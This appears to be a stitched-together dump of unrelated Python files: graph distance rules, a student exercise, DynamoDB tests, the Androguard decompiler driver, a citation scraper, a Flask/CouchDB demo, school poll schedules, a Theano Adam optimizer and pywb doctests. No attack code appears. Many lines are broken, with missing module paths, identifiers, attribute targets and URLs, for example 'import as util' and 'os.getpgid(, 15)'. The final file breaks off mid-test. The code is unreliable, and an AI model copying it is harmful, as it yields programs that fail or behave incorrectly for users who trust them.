pos_src origin = np.array([(0., 0.)]) # todo correct this dist_tmp = np.squeeze(cdist(vect.T, origin), axis=1) if dist is not None: dist.extend(dist_tmp) if rule == 'exp': return np.exp(np.divide(dist_tmp, -scale)) elif rule == 'gaussian': return np.exp(-0.5*np.square(np.divide(dist_tmp, scale))) elif rule == 'lin': return np.divide(scale - dist_tmp, scale).clip(min=0.) else: raise InvalidArgument('Unknown rule "' + rule + '".') def max_proba_dist_rule(rule, scale, max_proba, pos_src, pos_targets, dist=None): ''' DR test from one source to several targets Parameters ---------- rule : str Either 'exp', 'gaussian', or 'lin'. scale : float Characteristic scale. norm : float Normalization factor giving proba at zero distance. pos_src : 2-tuple Positions of the sources. pos_targets : array of shape (2, N) Positions of the targets. dist : list, optional (default: None) List that will be filled with the distances of the edges. Returns ------- Array of size N giving the probability of the edges according to the rule. ''' x, y = pos_src s = np.repeat([[x], [y]], pos_targets.shape[1], axis=1) vect = pos_targets - np.repeat([[x], [y]], pos_targets.shape[1], axis=1) origin = np.array([(0., 0.)]) # todo correct this dist_tmp = np.squeeze(cdist(vect.T, origin), axis=1) if dist is not None: dist.extend(dist_tmp) if rule == 'exp': return max_proba*np.exp(np.divide(dist_tmp, -scale)) elif rule == 'gaussian': return max_proba*np.exp(-0.5*np.square(np.divide(dist_tmp, scale))) elif rule == 'lin': return max_proba*np.divide(scale - dist_tmp, scale).clip(min=0.) else: raise InvalidArgument('Unknown rule "' + rule + '".') def _set_dist_new_edges(new_attr, graph, edge_list): ''' Add the distances to the edge attributes ''' if graph.is_spatial() and "distance" not in new_attr: if len(edge_list) == 1: positions = graph.get_positions(list(edge_list[0])) new_attr["distance"] = cdist([positions[0]], [positions[1]])[0][0] else: positions = graph.get_positions() mat = cdist(positions, positions) distances = [mat[e[0], e[1]] for e in edge_list] new_attr["distance"] = distances def _set_default_edge_attributes(g, attributes, num_edges): ''' Set default edge attributes values ''' for k in g.edge_attributes: skip = k in ("weight", "distance", "delay") if k not in attributes: dtype = g.get_attribute_type(k) if dtype == "string": attributes[k] = ["" for _ in range(num_edges)] elif dtype == "double" and not skip: attributes[k] = [np.NaN for _ in range(num_edges)] elif dtype == "int": attributes[k] = [0 for _ in range(num_edges)] elif not skip: attributes[k] = [None for _ in range(num_edges)]
Parcial 1/
import math def Interlace_Iter(L1, L2): L3=[] for i in range(min(len(L1),len(L2))): L3.append(L1[i]) L3.append(L2[i]) if len(L1) < len(L2): L3=L3+L2[len(L1):] elif len(L2) < len(L1): L3=L3+L1[len(L2):] return L3 def Interlace_Rec(L1,L2): L4=[] def Recursive_Part(L1,L2,L4): if len(L1)==0 or len(L2)==0: if len(L1) < len(L2): L4=L4+L2[:] elif len(L2) < len(L1): L4=L4+L1[:] print L4 else: L4.append(L1[0]) L4.append(L2[0]) L1.pop(0) L2.pop(0) Recursive_Part(L1,L2,L4) return Recursive_Part(L1,L2,L4) def IntLog(n,b): e=0 while b**e < n: e=e+1 if b**e > n: e-=1 return e def g(x): return (0.5)*(x+(2.0/x)) def PuntoFijo(a, epsilon, N): #La funcion g esta definida arriba n=1 x0=float(a) x1=g(x0) dif = abs(x0-x1) while n <= N and dif > epsilon: x0=x1 x1=g(x1) dif = abs(x0-x1) n+=1 if n > N: n-=1 x_ultimo = x1 return x_ultimo, dif, n def CribaEratostenes(n): criba=[False,False]+[True]*(n-1) i = 2 while i <= math.sqrt(n): j=2 if criba[i]== True: while i*j <= n: criba[i*j]=False j+=1 i+=1 prime=[] for k in range(len(criba)): if criba[k]==True: prime.append(k) return prime
import os import random import subprocess from moto import mock_dynamodb2 @mock_dynamodb2 class TestVault(object): def test_crud_it_should_succeed(self): from cis_identity_vault import vault v = vault.IdentityVault() os.environ["CIS_ENVIRONMENT"] = "purple" os.environ["CIS_REGION_NAME"] = "us-east-1" os.environ["DEFAULT_AWS_REGION"] = "us-east-1" v.connect() result = v.find_or_create() assert result is not None result = v.destroy() assert result["ResponseMetadata"]["HTTPStatusCode"] == 200 class TestVaultDynalite(object): def setup_class(self): self.dynalite_port = str(random.randint(32000, 34000)) os.environ["CIS_DYNALITE_PORT"] = self.dynalite_port self.dynaliteprocess = subprocess.Popen( [ "/usr/sbin/java", "-Djava.library.path=/opt/dynamodb_local/DynamoDBLocal_lib", "-jar", "/opt/dynamodb_local/DynamoDBLocal.jar", "-inMemory", "-port", self.dynalite_port, ], preexec_fn=os.setsid, ) def test_create_using_dynalite(self): os.environ["CIS_ENVIRONMENT"] = "local" os.environ["CIS_DYNALITE_PORT"] = self.dynalite_port os.environ["CIS_REGION_NAME"] = "us-east-1" from cis_identity_vault import vault v = vault.IdentityVault() v.connect() result = v.find_or_create() assert result is not None result = v.find_or_create() assert result is not None def teardown_class(self): os.killpg(os.getpgid(, 15)
# This file is part of Androguard. # # Copyright (c) 2012 Geoffroy Gueguen <> # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys sys.path.append('./') import logging from collections import defaultdict import androguard.core.androconf as androconf import as util from androguard.core.analysis import analysis from androguard.core.bytecodes import apk, dvm from import identify_structures from import (build_def_use, place_declarations, dead_code_elimination, register_propagation, split_variables) from import construct from import Param, ThisParam from import Writer def auto_vm(filename): ret = androconf.is_android(filename) if ret == 'APK': return dvm.DalvikVMFormat(apk.APK(filename).get_dex()) elif ret == 'DEX': return dvm.DalvikVMFormat(open(filename, 'rb').read()) elif ret == 'ODEX': return dvm.DalvikOdexVMFormat(open(filename, 'rb').read()) return None class DvMethod(): def __init__(self, methanalysis): method = methanalysis.get_method() self.start_block = next(methanalysis.get_basic_blocks().get(), None) self.cls_name = method.get_class_name() = method.get_name() self.lparams = [] self.var_to_name = defaultdict() self.writer = None self.graph = None self.access = util.get_access_method(method.get_access_flags()) desc = method.get_descriptor() self.type = desc.split(')')[-1] self.params_type = util.get_params_type(desc) self.exceptions = methanalysis.exceptions.exceptions code = method.get_code() if code is None: logger.debug('No code : %s %s',, self.cls_name) else: start = code.registers_size - code.ins_size if 'static' not in self.access: self.var_to_name[start] = ThisParam(start, self.lparams.append(start) start += 1 num_param = 0 for ptype in self.params_type: param = start + num_param self.lparams.append(param) self.var_to_name[param] = Param(param, ptype) num_param += util.get_type_size(ptype) if not __debug__: from androguard.core import bytecode bytecode.method2png('/tmp/dad/graphs/%s#%s.png' % \ (self.cls_name.split('/')[-1][:-1],, methanalysis) def process(self): logger.debug('METHOD : %s', # Native methods... no blocks. if self.start_block is None: logger.debug('Native Method.') self.writer = Writer(None, self) self.writer.write_method() return graph = construct(self.start_block, self.var_to_name, self.exceptions) self.graph = graph if not __debug__: util.create_png(self.cls_name,, graph, '/tmp/dad/blocks') use_defs, def_uses = build_def_use(graph, self.lparams) split_variables(graph, self.var_to_name, def_uses, use_defs) dead_code_elimination(graph, def_uses, use_defs) register_propagation(graph, def_uses, use_defs) place_declarations(graph, self.var_to_name, def_uses, use_defs) del def_uses, use_defs # After the DCE pass, some nodes may be empty, so we can simplify the # graph to delete these nodes. # We start by restructuring the graph by spliting the conditional nodes # into a pre-header and a header part. graph.split_if_nodes() # We then simplify the graph by merging multiple statement nodes into # a single statement node when possible. This also delete empty nodes. graph.simplify() graph.compute_rpo() if not __debug__: util.create_png(self.cls_name,, graph, '/tmp/dad/pre-structured') identify_structures(graph, graph.immediate_dominators()) if not __debug__: util.create_png(self.cls_name,, graph, '/tmp/dad/structured') self.writer = Writer(graph, self) self.writer.write_method() del graph def show_source(self): print self.get_source() def get_source(self): if self.writer: return '%s' % self.writer return '' def __repr__(self): return 'Method %s' % class DvClass(): def __init__(self, dvclass, vma): name = dvclass.get_name() if name.find('/') > 0: pckg, name = name.rsplit('/', 1) else: pckg, name = '', name self.package = pckg[1:].replace('/', '.') = name[:-1] self.vma = vma self.methods = dict((meth.get_method_idx(), meth) for meth in dvclass.get_methods()) self.fields = dict((field.get_name(), field) for field in dvclass.get_fields()) self.subclasses = {} self.code = [] self.inner = False access = dvclass.get_access_flags() # If interface we remove the class and abstract keywords if 0x200 & access: prototype = '%s %s' if access & 0x400: access -= 0x400 else: prototype = '%s class %s' self.access = util.get_access_class(access) self.prototype = prototype % (' '.join(self.access), self.interfaces = dvclass.interfaces self.superclass = dvclass.get_superclassname()'Class : %s','Methods added :') for index, meth in self.methods.iteritems():'%s (%s, %s)', index,,'') def add_subclass(self, innername, dvclass): self.subclasses[innername] = dvclass dvclass.inner = True def get_methods(self): return self.methods def process_method(self, num): methods = self.methods if num in methods: method = methods[num] if not isinstance(method, DvMethod): method.set_instructions([i for i in method.get_instructions()]) meth = methods[num] = DvMethod(self.vma.get_method(method)) meth.process() method.set_instructions([]) else: method.process() else: logger.error('Method %s not found.', num) def process(self): for klass in self.subclasses.values(): klass.process() for meth in self.methods: self.process_method(meth) def get_source(self): source = [] if not self.inner and self.package: source.append('package %s;\n' % self.package) if self.superclass is not None: self.superclass = self.superclass[1:-1].replace('/', '.') if self.superclass.split('.')[-1] == 'Object': self.superclass = None if self.superclass is not None: self.prototype += ' extends %s' % self.superclass if self.interfaces is not None: interfaces = self.interfaces[1:-1].split(' ') self.prototype += ' implements %s' % ', '.join( [n[1:-1].replace('/', '.') for n in interfaces]) source.append('%s {\n' % self.prototype) for name, field in sorted(self.fields.iteritems()): access = util.get_access_field(field.get_access_flags()) f_type = util.get_type(field.get_descriptor()) source.append(' ') if access: source.append(' '.join(access)) source.append(' ') if field.init_value: value = field.init_value.value if f_type == 'String': value = '"%s"' % value source.append('%s %s = %s;\n' % (f_type, name, value)) else: source.append('%s %s;\n' % (f_type, name)) for klass in self.subclasses.values(): source.append(klass.get_source()) for _, method in self.methods.iteritems(): if isinstance(method, DvMethod): source.append(method.get_source()) source.append('}\n') return ''.join(source) def show_source(self): print self.get_source() def __repr__(self): if not self.subclasses: return 'Class(%s)' % return 'Class(%s) -- Subclasses(%s)' % (, self.subclasses) class DvMachine(): def __init__(self, name): vm = auto_vm(name) if vm is None: raise ValueError('Format not recognised: %s' % name) self.vma = analysis.uVMAnalysis(vm) self.classes = dict((dvclass.get_name(), dvclass) for dvclass in vm.get_classes()) #util.merge_inner(self.classes) def get_classes(self): return self.classes.keys() def get_class(self, class_name): for name, klass in self.classes.iteritems(): if class_name in name: if isinstance(klass, DvClass): return klass dvclass = self.classes[name] = DvClass(klass, self.vma) return dvclass def process(self): for name, klass in self.classes.iteritems():'Processing class: %s', name) if isinstance(klass, DvClass): klass.process() else: dvclass = self.classes[name] = DvClass(klass, self.vma) dvclass.process() def show_source(self): for klass in self.classes.values(): klass.show_source() def process_and_show(self): for name, klass in sorted(self.classes.iteritems()):'Processing class: %s', name) if not isinstance(klass, DvClass): klass = DvClass(klass, self.vma) klass.process() klass.show_source() logger = logging.getLogger('dad') sys.setrecursionlimit(5000) def main(): # logger.setLevel(logging.DEBUG) for debugging output # comment the line to disable the logging. logger.setLevel(logging.INFO) console_hdlr = logging.StreamHandler(sys.stdout) console_hdlr.setFormatter(logging.Formatter('%(levelname)s: %(message)s')) logger.addHandler(console_hdlr) default_file = 'examples/android/TestsAndroguard/bin/TestActivity.apk' if len(sys.argv) > 1: machine = DvMachine(sys.argv[1]) else: machine = DvMachine(default_file)'========================')'Classes:') for class_name in sorted(machine.get_classes()):' %s', class_name)'========================') cls_name = raw_input('Choose a class: ') if cls_name == '*': machine.process_and_show() else: cls = machine.get_class(cls_name.decode('utf8')) if cls is None: logger.error('%s not found.', cls_name) else:'======================') for method_id, method in cls.get_methods().items():'%d: %s', method_id,'======================') meth = raw_input('Method: ') if meth == '*':'CLASS = %s', cls) cls.process() else: cls.process_method(int(meth))'Source:')'===========================') cls.show_source() if __name__ == '__main__': main()
#!/usr/bin/env python2.6 import os, sys, re, urllib2, cookielib, string from urllib import urlencode from urllib2 import urlopen from copy import copy import BeautifulSoup import htmlentitydefs import html5lib from html5lib import treebuilders import warnings import codecs warnings.simplefilter("ignore",DeprecationWarning) import socket socket.setdefaulttimeout(15) class ParseException(Exception): pass ## # Removes HTML or XML character references and entities from a text string. # # @param text The HTML (or XML) source text. # @return The plain text, as a Unicode string, if necessary. def unescape(text): def fixup(m): text = if text[:2] == "&#": # character reference try: if text[:3] == "&#x": return unichr(int(text[3:-1], 16)) else: return unichr(int(text[2:-1])) except ValueError: pass else: # named entity try: text = unichr(htmlentitydefs.name2codepoint[text[1:-1]]) except KeyError: pass return text # leave as is #return re.sub("&#?\w+;", fixup, text).encode('utf-8') return re.sub("&#?\w+;", fixup, text) def meta(soup, key): el = soup.find("meta", {'name':key}) if el: return el['content']; return None def item(soup, entry, key): el = meta(soup, key) if el: print "%s\t%s" % (entry, el) def handle(url): # m = re.match(r'http://www\.mdpi\.com/(\d{4}-\d{4}/\d+/\d+/\d+)', url) if not m: raise ParseException, "URL not supported %s" % url wkey = #u = codecs.getreader('utf-8')(urlopen(url)) #page = page = urlopen(url).read() parser = html5lib.HTMLParser(tree=treebuilders.getTreeBuilder("beautifulsoup")) soup = parser.parse(page) head = soup.find("head") doi = meta(head, 'dc.identifier') if not doi: raise ParseException, "Cannot find DOI" m = re.match(r'(?:doi:)?(.*)$', doi) if not m: raise ParseException, "Cannot find DOI" doi = print "begin_tsv" print "linkout\tDOI\t\t%s\t\t" % (doi) print "linkout\tMDPI\t\t%s\t\t" % wkey print "type\tJOUR" title = meta(head, "dc.title") #if title: # print "title\t%s" % unescape(title) if title: print "title\t%s" % title item(head, "journal", "prism.publicationName") item(head, "volume", "prism.volume") item(head, "issue", "prism.number") item(head, "start_page", "prism.startingPage") item(head, "end_page", "prism.endingPage") item(head, "issn", "prism.issn") item(head, "abstract", "dc.description") date = meta(head, '') if date: m = re.match(r'(\d+)-(\d+)-(\d+)', date) if m: year = month = day = if year: print "year\t%s" % year if month: print "month\t%s" % month if day: print "day\t%s" % day # authors authors = head.findAll("meta", {"name":"dc.creator"}) if authors: for a in authors: print "author\t%s" % a['content'] print "doi\t%s" % doi print "end_tsv" print "status\tok" # read url from std input url = sys.stdin.readline() # get rid of the newline at the end url = url.strip() sys.stdout = codecs.getwriter('utf-8')(sys.stdout) try: handle(url) except Exception, e: import traceback line = traceback.tb_lineno(sys.exc_info()[2]) print "\t".join(["status", "error", "There was an internal error processing this request. Please report this to quoting error code %d." % line]) raise
# This file is part of Copernicus # # # Copyright (C) 2011, Sander Pronk, Iman Pouya, Erik Lindahl, and others. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as published # by the Free Software Foundation # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. import logging import json log=logging.getLogger(__name__) import cpc.util import run import cpc.command class ResourceList: """A list of resources.""" def __init__(self): self.rsrc=dict() def set(self, name, value): """Set a specific value.""" self.rsrc[name]=value def get(self, name): """Get a value with a specific name.""" return self.rsrc.get(name) def getValue(self): """Return a Value object with all settings.""" retDict=dict() for name, item in self.rsrc.iteritems(): retDict[name] = run.IntValue(item) return run.DictValue(retDict) def iteritems(self): return self.rsrc.iteritems() def empty(self): return len(self.rsrc) == 0 class Resources: """Class describing minimum, maximum, and optimal command resources. For use in functions that have min/max/optimal resources.""" def __init__(self, inputValue=None): self.min=ResourceList() self.max=ResourceList() self.workers=dict() if inputValue is not None: self.getInputValue(inputValue) def getInputValue(self, inputValue): # read in min values for name, item in inputValue.value["min"].value.iteritems(): self.min.set(name, int(item.value)) # read in max values for name, item in inputValue.value["max"].value.iteritems(): self.max.set(name, int(item.value)) # read worker items for workerName, worker in inputValue.value["workers"].value.iteritems(): if workerName not in self.workers: self.workers[workerName]=ResourceList() for name, item in worker.value.iteritems(): self.workers[workerName].set(name, int(item)) def setOutputValue(self): """Create a Value object based on the settings in this object.""" workerDict=dict() for workerName, item in self.workers: workerDict[workerName] = item.getValue() return run.RecordValue( { "min": self.min.getValue(), "max": self.max.getValue(), "workers": run.DictValue(workerDict) } ) def updateCmd(self, cmd): """Set the command's resources from an input value.""" for name, item in self.min.iteritems(): cmd.addMinRequired(cpc.command.Resource(name, item)) for name, item in self.max.iteritems(): cmd.addMaxAllowed(cpc.command.Resource(name, item)) def save(self,filename): svf=dict() svf['min']=self.min.rsrc svf['max']=self.max.rsrc wrkrs=dict() for name, w in self.workers.iteritems(): wrkrs[name] = w.rsrc svf['workers']=wrkrs fout=open(filename, 'w') fout.write(json.dumps(svf)) fout.write('\n') fout.close() def load(self, filename): fin=open(filename, 'r') svf=json.loads( fin.close() for name, value in svf['min'].iteritems(): self.min.set(name, int(value)) for name, value in svf['max'].iteritems(): self.max.set(name, int(value)) for name, w in svf['workers'].iteritems(): if name not in self.workers: self.workers[name] = ResourceList() for itemname, value in w: self.workers[name].set(itemname, int(value))
# Copyright 2015 IBM Corp. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from flask import Flask, jsonify import json import requests from flask import Flask, render_template, request, url_for import couchdb, couchdb.mapping from couchdb import Database,Server, Session from couchdb.mapping import Document, TextField, IntegerField, DateTimeField from datetime import datetime import platform from mymethods import selectdb app = Flask(__name__) @app.route('/') def Welcome(): print ("") return app.send_static_file('index.html') @app.route('/listdbs', methods = ['POST', 'GET']) def listdbs(): srv = request.form['srv'] couch=selectdb(srv) databases= "<h1>Databases1</h1><hr>" server = couch for db in server: print (db) databases=databases+" "+ db +"<br>" return databases #--------------------------------------------------- #app.route('/api/createdbdlg') def createdbdlg(): print ("Createdbdlg") return app.send_static_file('index.html') #---------------------------------------------------- @app.route('/createdb', methods = ['POST', 'GET']) def createdb(): db = request.form['db'] srv = request.form['srv'] print ("Database "+ db) couch=selectdb(srv) print ("Creating database "+ db) rc = couch.create(db) return "created database "+ db #--------------------------------------------------- @app.route('/dbinsert', methods=['GET','POST']) def dbinsert(): srv = request.form['srv'] database = request.form['database'] id = request.form['id'] name = request.form['name'] age = request.form['age'] health = request.form['health'] couch=selectdb(srv) db = couch[database] doc = ({'name': name,'age':age,'health': health}) return "hit kom vi "+ srv + " database " + database + " name: " + name + " age "+ age + " health: "+ health #------------------------------------ @app.route('/classprint', methods = ['POST']) def classprint(): srv = request.form['srv'] db = request.form['db'] print ("Classprint DB : "+ db) couch=selectdb(srv) db = couch[db] record = "<h1>Records</h1><table><hr>" for id in db: #print (id) doc = db[id] rid = doc['_id'] name = doc['name'] age = doc['age'] health = doc['health'] rec = "<tr><td>Id: "+rid+"<td>Name: <td>"+name + "<td> Age: "+str(age)+"<td> Health: "+health+"</tr>" record=record+rec record=record+"</table>" print ("Classprint") return record @app.route('/jinja2') def jinja2(): print ("Jinja2") return render_template('template.html', my_string="Wheeeee!", my_list=['database1','database2','database3']) #------------------------------------------------ port = os.getenv('PORT', '5000') print ("") if __name__ == "__main__":'', port=int(port))
import datetime from datetime import date #All term schedulled polls are computed based on these dates #these dates are necessary for the system to work properly and #should be entered every beginning of year. See _next_term_question_date() FIRST_TERM_BEGINS = datetime.datetime(2014, 2, 3) SECOND_TERM_BEGINS = datetime.datetime(2014, 5, 19) THIRD_TERM_BEGINS = datetime.datetime(2014, 9, 8) # Current term start and end dates SCHOOL_TERM_START = FIRST_TERM_BEGINS SCHOOL_TERM_END = datetime.datetime(2014, 4, 25) SCHOOL_HOLIDAYS=[ # (start_of_holiday_datetime, end_of_holidate_datetime), # (start_of_holiday2_datetime...), # (,), # ... #start of year holiday season (datetime.datetime(2014, 1, 1), datetime.datetime(2014, 2, 2)), #public holidays (datetime.datetime(2014, 1, 26), '1d'), #Liberation day (datetime.datetime(2014, 3, 8), '1d'), #Women's day (datetime.datetime(2014, 4, 18), datetime.datetime(2014, 4, 21)), #Easter holiday (datetime.datetime(2014, 5, 1), '1d'), #Labour day (datetime.datetime(2014, 6, 3), '1d'), #Uganda Martyrs' Day (datetime.datetime(2014, 6, 9), '1d'), #Heroes' day (datetime.datetime(2014, 10, 9), '1d'), #Independence Day (datetime.datetime(2014, 12, 6), datetime.datetime(2014, 12, 31)), #Xmas holiday #TBD (datetime.datetime(2014, 8, 8), '1d'), #Idd El Fitri (datetime.datetime(2014, 10, 15), '1d'), #Idd Adhua ] WEEKLY = [ # Term one date(2014, 2, 14), # First poll delayed by a day. date(2014, 2, 20), date(2014, 2, 27), date(2014, 3, 6), date(2014, 3, 13), date(2014, 3, 20), date(2014, 3, 27), date(2014, 4, 3), date(2014, 4, 10), date(2014, 4, 17), date(2014, 4, 24), # Term two date(2014, 5, 22), date(2014, 5, 29), date(2014, 6, 5), date(2014, 6, 12), date(2014, 6, 19), date(2014, 6, 26), date(2014, 7, 3), date(2014, 7, 10), date(2014, 7, 17), date(2014, 7, 24), date(2014, 7, 31), date(2014, 8, 7), # Term three date(2014, 9, 11), date(2014, 9, 18), date(2014, 9, 25), date(2014, 10, 2), #date(2014, 10, 9), Independence Day date(2014, 10, 10), date(2014, 10, 16), date(2014, 10, 23), date(2014, 10, 30), date(2014, 11, 6), date(2014, 11, 13), date(2014, 11, 20), date(2014, 11, 27), date(2014, 12, 4), ] VIOLENCE = [ # Term one date(2014, 2, 24), date(2014, 3, 24), date(2014, 4, 22), # Term two date(2014, 5, 26), date(2014, 6, 23), date(2014, 7, 28), # Term three date(2014, 9, 29), date(2014, 10, 27), date(2014, 11, 24), ] HEAD_MEALS = [ # Term one date(2014, 2, 21), date(2014, 3, 28), date(2014, 4, 25), # Term two date(2014, 5, 23), date(2014, 6, 27), date(2014, 7, 25), # Term three date(2014, 9, 26), date(2014, 10, 24), date(2014, 11, 28), ] SMC_MEALS = [ # Term one date(2014, 2, 24), date(2014, 3, 24), date(2014, 4, 22), # Term two date(2014, 5, 26), date(2014, 6, 23), date(2014, 7, 28), # Term three date(2014, 9, 29), date(2014, 10, 27), date(2014, 11, 24), ] GEM = [ # Term one date(2014, 2, 21), date(2014, 3, 28), date(2014, 4, 25), # Term two date(2014, 5, 23), date(2014, 6, 27), date(2014, 7, 25), # Term three date(2014, 9, 26), date(2014, 10, 24), date(2014, 11, 28), ] TEACHER_DEPLOYMENT = [ date(2014, 2, 21), date(2014, 6, 6), date(2014, 10, 3), ] P6_ENROLLMENT = [ date(2014, 2, 26), date(2014, 5, 28), date(2014, 9, 17), ] P3_ENROLLMENT = [ date(2014, 2, 28), date(2014, 5, 30), date(2014, 9, 19), ] ENROLLMENT = [ date(2014, 3, 4), date(2014, 6, 11), date(2014, 10, 7), ] UPE_GRANT = [ date(2014, 3, 5), date(2014, 6, 25), date(2014, 10, 8), ] SMC_MONITORING = [ date(2014, 4, 23), date(2014, 8, 1), date(2014, 11, 26), ] MONITORING = [ date(2014, 4, 23), date(2014, 8, 1), date(2014, 11, 26), ] WATER_SOURCE = [ date(2014, 3, 19), date(2014, 6, 17), date(2014, 10, 13), ] FUNCTIONAL_WATER_SOURCE = [ date(2014, 3, 21), date(2014, 6, 18), date(2014, 10, 14), ] POLL_DATES = { 'edtrac_head_teachers_weekly': WEEKLY, 'edtrac_upe_grant_headteacher_termly': UPE_GRANT, 'edtrac_teacher_deployment_headteacher_termly': TEACHER_DEPLOYMENT, 'edtrac_script_water_source': WATER_SOURCE, 'edtrac_script_functional_water_source': FUNCTIONAL_WATER_SOURCE, 'edtrac_p6_enrollment_headteacher_termly': P6_ENROLLMENT, 'edtrac_headteacher_violence_monthly': VIOLENCE, 'edtrac_head_teachers_monthly': TEACHER_DEPLOYMENT, 'edtrac_p3_enrollment_headteacher_termly': P3_ENROLLMENT, 'edtrac_headteacher_meals_monthly': HEAD_MEALS, 'edtrac_head_teachers_midterm': MONITORING, 'edtrac_school_enrollment_termly': ENROLLMENT, 'edtrac_smc_weekly': WEEKLY, 'edtrac_smc_termly': SMC_MONITORING, 'edtrac_smc_monthly': SMC_MEALS, 'edtrac_p3_teachers_weekly': WEEKLY, 'edtrac_p6_teachers_weekly': WEEKLY, 'edtrac_gem_monthly': GEM, } GROUPS = {'Teachers' : [], 'Head Teachers' : ['edtrac_head_teachers_weekly', 'edtrac_upe_grant_headteacher_termly', 'edtrac_teacher_deployment_headteacher_termly', 'edtrac_script_water_source', 'edtrac_script_functional_water_source', 'edtrac_p6_enrollment_headteacher_termly', 'edtrac_headteacher_violence_monthly', 'edtrac_head_teachers_monthly', 'edtrac_p3_enrollment_headteacher_termly', 'edtrac_school_enrollment_termly', 'edtrac_head_teachers_midterm', 'edtrac_headteacher_meals_monthly'], 'SMC' : ['edtrac_smc_weekly', 'edtrac_smc_termly', 'edtrac_smc_monthly'], 'GEM': ['edtrac_gem_monthly'], 'p3' : ['edtrac_p3_teachers_weekly'], 'p6' : ['edtrac_p6_teachers_weekly']}
from __future__ import absolute_import, division, print_function, unicode_literals from builtins import ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str, super, zip import theano import theano.tensor as T import math import numpy as np from architecture.layer import * floatX = theano.config.floatX ################################################################################################################################## class Optimizer(object): ################################################################# def __init__(self): pass ################################################################# def compile(self, params, grads): raise NotImplementedError() ################################################################# def init(self): raise NotImplementedError() ################################################################# def next_update_list(self): raise NotImplementedError() ################################################################################################################################## class Adam(Optimizer): ################################################################# def __init__(self, gradient_clipping_magnitude=None, learning_rate=0.001, epsilon=1e-8, beta1=0.9, beta2=0.999): super(Adam, self).__init__() self.gradient_clipping_magnitude = gradient_clipping_magnitude self.learning_rate = learning_rate self.epsilon = epsilon self.beta1 = beta1 self.beta2 = beta2 self.params = None self.grads = None = None self.vs = None self.t = None ################################################################# def compile(self, params, grads): self.params = params if self.gradient_clipping_magnitude is None: self.grads = grads else: self.grads = [ T.clip(g, -self.gradient_clipping_magnitude, self.gradient_clipping_magnitude) for g in grads ] = [ theano.shared(np.zeros_like(p.get_value(), dtype=floatX)) for p in self.params ] self.vs = [ theano.shared(np.zeros_like(p.get_value(), dtype=floatX)) for p in self.params ] self.t = theano.shared(np.array(0, dtype='int64')) self.init() ################################################################# def init(self): for m in m.set_value(np.zeros_like(m.get_value(), dtype=floatX)) for v in self.vs: v.set_value(np.zeros_like(v.get_value(), dtype=floatX)) self.t.set_value(np.array(1, dtype='int64')) ################################################################# def next_update_list(self): if self.params is None: raise ValueError('Optimizer has not been compiled yet.') new_ms = [ self.beta1*m + (1 - self.beta1)*g for (m,g) in zip(, self.grads) ] new_vs = [ self.beta2*v + (1 - self.beta2)*T.sqr(g) for (v,g) in zip(self.vs, self.grads) ] ms_hat = [ m/T.cast(1 - T.pow(self.beta1, self.t), floatX) for m in new_ms ] vs_hat = [ v/T.cast(1 - T.pow(self.beta2, self.t), floatX) for v in new_vs ] return ( [ (m, new_m) for (m,new_m) in zip(, new_ms) ] + [ (v, new_v) for (v,new_v) in zip(self.vs, new_vs) ] + [ (self.t, self.t + 1) ] + [ (p, p - self.learning_rate*m_hat/(T.sqrt(v_hat) + self.epsilon)) for (p,m_hat,v_hat) in zip(self.params, ms_hat, vs_hat) ] )
#================================================================= r""" # LimitReader Tests >>> LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 10).read(26) 'abcdefghji' >>> LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 8).readline(26) 'abcdefgh' >>> LimitReader.wrap_stream(LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 8), 4).readline(26) 'abcd' >>> read_multiple(LimitReader(BytesIO('abcdefghjiklmnopqrstuvwxyz'), 10), [2, 2, 20]) 'efghji' # zero-length read >>> LimitReader(BytesIO('a'), 0).readline(0) '' # don't wrap if invalid length >>> b = BytesIO('b') >>> LimitReader.wrap_stream(b, 'abc') == b True # BlockLoader Tests (includes LimitReader) # Ensure attempt to read more than 100 bytes, reads exactly 100 bytes >>> len(BlockLoader().load(test_cdx_dir + 'iana.cdx', 0, 100).read('400')) 100 # no length specified, read full amount requested >>> len(BlockLoader().load(to_file_url(test_cdx_dir + 'example.cdx'), 0, -1).read(400)) 400 # no such file >>> len(BlockLoader().load('_x_no_such_file_', 0, 100).read('400')) Traceback (most recent call last): IOError: [Errno 2] No such file or directory: '_x_no_such_file_' # HMAC Cookie Maker >>> BlockLoader(HMACCookieMaker('test', 'test', 5)).load('', 41, 14).read() 'Example Domain' # fixed cookie, range request >>> BlockLoader('some=value').load('', 41, 14).read() 'Example Domain' # range request >>> BlockLoader().load('', 1262).read() '</html>\n' # test with extra id, ensure 4 parts of the A-B=C-D form are present >>> len(re.split('[-=]', HMACCookieMaker('test', 'test', 5).make('extra'))) 4 # cookie extract tests >>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'a') 'b' >>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'c') 'd' >>> extract_client_cookie(dict(HTTP_COOKIE='a=b; c=d'), 'x') >>> extract_client_cookie(dict(HTTP_COOKIE='x'), 'x') >>> extract_client_cookie({}, 'y') # append_post_query >>> append_post_query('', 'foo=bar') '' >>> append_post_query('', '') '' >>> append_post_query('', 'foo=bar') '' # extract_post_query tests # correct POST data >>> post_data = 'foo=bar&dir=%2Fbaz' >>> extract_post_query('POST', 'application/x-www-form-urlencoded', len(post_data), BytesIO(post_data)) 